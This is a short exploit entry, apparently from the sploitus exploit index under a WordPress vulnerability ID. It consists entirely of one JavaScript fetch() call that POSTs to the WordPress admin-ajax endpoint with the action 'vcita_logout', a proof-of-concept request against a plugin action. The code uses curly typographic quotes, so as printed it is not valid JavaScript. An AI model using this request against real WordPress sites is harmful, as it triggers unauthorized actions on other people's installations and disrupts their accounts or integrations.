Share
## https://sploitus.com/exploit?id=WPEX-ID:65375477-7BDF-4043-923A-25FBE02F7684
fetch(“/wp-admin/admin-ajax.php?action=vcita_logout”, {
     method: “POST”,
     headers: {
       Accept: “*/*”,
       “Content-Type”: “application/json”,
     },
   });